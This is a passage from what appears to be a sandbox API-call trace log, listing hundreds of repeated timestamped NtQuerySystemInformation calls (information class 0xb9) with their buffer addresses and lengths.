ResultLength=0x0) [0303.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f010, Length=0x38, ResultLength=0x0) [0303.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f010, Length=0x38, ResultLength=0x0) [0303.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f010, Length=0x38, ResultLength=0x0) [0303.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f010, Length=0x38, ResultLength=0x0) [0303.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0f0, Length=0x40, ResultLength=0x0) [0303.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0f0, Length=0x40, ResultLength=0x0) [0303.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f010, Length=0x38, ResultLength=0x0) [0303.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f010, Length=0x38, ResultLength=0x0) [0303.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f010, Length=0x38, ResultLength=0x0) [0303.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f010, Length=0x38, ResultLength=0x0) [0303.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f010, Length=0x38, ResultLength=0x0) [0303.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f010, Length=0x38, ResultLength=0x0) [0303.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f010, Length=0x38, ResultLength=0x0) [0303.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x38, ResultLength=0x0) [0303.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 